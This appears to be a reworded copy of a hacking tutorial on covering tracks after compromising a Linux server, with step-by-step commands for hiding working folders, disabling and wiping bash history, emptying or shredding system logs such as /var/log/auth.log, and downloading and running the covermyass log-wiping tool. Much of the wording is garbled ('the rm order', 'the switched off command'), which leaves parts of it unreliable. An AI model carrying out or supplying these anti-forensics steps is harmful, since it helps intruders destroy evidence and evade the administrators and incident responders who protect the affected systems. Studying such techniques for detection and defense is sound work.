As a hacker, the final stage of exploitation is clearing their tracks, which involves wiping all activities and logs so they can prevent them from being detected. It is especially critical for persistence if the target is re-approached by the attacker in the future.
To show you the basics of hiding your tracks, we’ll first compromise a target and then explore some of the techniques used to delete Bash history, clear logs, and stay hidden after exploiting a Linux system . You can watch our Cyber Weapons Lab video below which outlines my guide or skip below to jump straight to the written steps.
Step 1: Compromise a target
The first thing we need to do is exploit the target. We can use command injection to take advantage of the way the server handles OS commands to get a shell. We also want to upgrade our new shell to a fully interactive shell. Doing this will make it easier to work in general and we can also use tab completion and terminal history.
After that, we can escalate our privileges to root so that we can take better advantage of the system to go unnoticed.
Step 2: Create an easy to delete hidden folder
Once we have root access, we can create a hidden folder to work out and keep any scripts or files in. It won’t fool anyone except the most noobie admin, but another layer of discretion certainly doesn’t hurt. First, let’s find all writable directories with the following command:
root@target:/# find / -perm -222 -type d 2>/dev/null /dev/shm /var/lock /var/lib/php5 /var/tmp /var/www/dav /var/www/twiki/data/Sandbox /var/www/twiki/data/Main /var/www/twiki/data/Know /var/www/twiki/data/TWiki /var/www/twiki/data/_default /var/www/twiki/data/Trash /var/www/twiki/pub/Sandbox /var/www/twiki/pub/Main /var/www/twiki/pub/Know /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL /var/www/twiki/pub/TWiki /var/www/twiki/pub/TWiki/TWikiDocGraphics /var/www/twiki/pub/TWiki/TWikiTemplates /var/www/twiki/pub/TWiki/TWikiLogos /var/www/twiki/pub/TWiki/PreviewBackground /var/www/twiki/pub/TWiki/FileAttachment /var/www/twiki/pub/TWiki/WabiSabi /var/www/twiki/pub/Trash /var/www/twiki/pub/icn /tmp /tmp/.ICE-unix /tmp/.X11-unix
We can create a hidden folder with the mkdir command and by prefixing the name with a period:
root@target:/# mkdir /dev/shm/.secret
If we list the contents of / dev / shm now, nothing will appear:
root@target:/# ls -l /dev/shm/ total 0
Only if we have the -a switch to show all files and folders, it will display:
root@target:/# ls -la /dev/shm/ total 0 drwxrwxrwt 3 root root 60 2019-06-19 13:49 . drwxr-xr-x 13 root root 13480 2019-06-19 13:41 .. drwxr-xr-x 2 root root 40 2019-06-19 13:49 .secret
And to delete the folder once we’re done on the machine, use the rmdir order:
root@target:/# rmdir /dev/shm/.secret/
Step 3: Delete the bash history
Bash keeps a list of commands used in the current session in memory, so it’s important to clear them to cover your tracks. We can view the current history with the history order:
root@target:/# history 1 cd / 2 ls 3 find / -perm -222 -type d 2>/dev/null 4 cd /dev/shm/ 5 cd / 6 mkdir /dev/shm/.secret 7 ls -l /dev/shm/ 8 ls -la /dev/shm/ 9 ls 10 rmdir /dev/shm/.secret/ 11 history
Commands are written to the HISTFILE environment variable, usually .bash_history. We can echo it to see the location:
root@target:/# echo $HISTFILE /root/.bash_history
We can do the switched off command to delete the variable:
root@target:/# unset HISTFILE
So if we repeat it again nothing will show up:
root@target:/# echo $HISTFILE
We can also prevent the command history from being saved by sending it to / dev / null. Set the variable on it:
Or do the same with the export command:
root@target:/# export HISTFILE=/dev/null
And the history is now being sent to / dev / null (nowhere):
root@target:/# echo $HISTFILE /dev/null
We can set the number of commands to be stored during the current session to 0 using the HISTSIZE variable:
You can also use the export command:
root@target:/# export HISTSIZE=0
We can also change the number of lines allowed in the history file with the variable HISTFILESIZE. Set this to 0:
Or with export:
root@target:/# export HISTFILESIZE=0
The set command can also be used to change shell options. Use the following command to turn off the history option:
root@target:/# set +o history
And to turn it back on:
root@target:/# set -o history
Likewise it is shops command can be used to change shell options. Use the following command to turn off history:
root@target:/# shopt -ou history
And to turn it back on:
root@target:/# shopt -os history
While executing commands on the target system, we can sometimes prevent them from being saved in history by starting the command with a leading space:
root@target:~# cat /etc/passwd
This technique does not always work and depends on the system.
We can also just clear the history with the -c switch:
root@target:~# history -c
Use the extension -w switch:
root@target:~# history -w
That will only clear the history for the current session. To make absolutely sure that the history is cleared when leaving a session, the following command is useful:
root@target:/# cat /dev/null > ~/.bash_history && history -c && exit
We can also use the kill command to exit the session without saving the history:
root@target:/# kill -9 $$
Step 4: Delete the log files
In addition to Bash history, log files must also be cleared to go unnoticed. Here are some common log files and what they contain:
- /var/log/auth.log Authentication
- /var/log/cron.log Cron Jobs
- / var / log / maillog Mail
- / var / log / httpd Apache
Of course we can easily delete a log with the rm order:
root@target:/# rm /var/log/auth.log
But that will likely cause red flags so it’s better to empty the file rather than delete it completely. We can do the truncate command to reduce size to 0:
root@target:/# truncate -s 0 /var/log/auth.log
Keep in mind that truncate is not always present on all systems.
We can achieve the same thing by not repeating anything in the file:
root@target:/# echo '' > /var/log/auth.log
And also with by itself to empty the file:
root@target:/# > /var/log/auth.log
We can also send it to / dev / null:
root@target:/# cat /dev/null > /var/log/auth.log
Or use the tee order:
root@target:/# true | tee /var/log/auth.log
We can also use the dd command not to write anything to the log file:
root@target:/# dd if=/dev/null of=/var/log/auth.log 0+0 records in 0+0 records out 0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s
The shred command can be used to overwrite a file with meaningless binary data:
root@target:/# shred /var/log/auth.log
We can even tack -to which truncates the file and overwrites it with zeros to hide evidence of shredding:
root@target:/# shred -zu /var/log/auth.log
Step 5: Use a tool to make sure things are cleared
To increase the likelihood of an activity on target going undiscovered, we can use a tool to make sure everything is cleared. Covermyass is a script that automates many of the processes we’ve already covered, including clearing log files and disabling Bash history.
We can get the script from GitHub with wget (assuming we can access the internet on the target, otherwise it has to be manually transferred):
root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass
Go to a writable folder and use chmod to make it executable:
root@target:/tmp# chmod +x covermyass
Then we can run it:
root@target:/tmp# ./covermyass Welcome to Cover my ass tool ! Select an option : 1) Clear logs for user root 2) Permenently disable auth & bash history 3) Restore settings to default 99) Exit tool >
We get a custom prompt with a few options to choose from. Let’s select the first one to clear the logs:
> 1 [+] /var/log/messages cleaned. [+] /var/log/auth.log cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.
We can also disable Bash and auth history with option 2:
> 2 [+] Permanently sending /var/log/auth.log to /dev/null [+] Permanently sending bash_history to /dev/null [+] Set HISTFILESIZE & HISTSIZE to 0 [+] Disabled history library Permenently disabled bash log.
And just in case you need to clean everything up quickly, just add now to the command:
root@target:/tmp# ./covermyass now [+] /var/log/messages cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.
Today we’ve explored several techniques used to hide traces and go unnoticed on a compromised machine. We’ve covered ways to disable and delete Bash history, methods to clear log files, and used the Covermyass tool to make sure our activity on the target was cleared. There are other ways to remove certain traces of an attack, such as using Metasploit, using shell scripting, or doing it on a hacked Windows machine, but the above should be all you need for a basic Linux -computer.
Do you want to earn money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.
Buy now (90% discount)>
Other worthwhile deals to check out: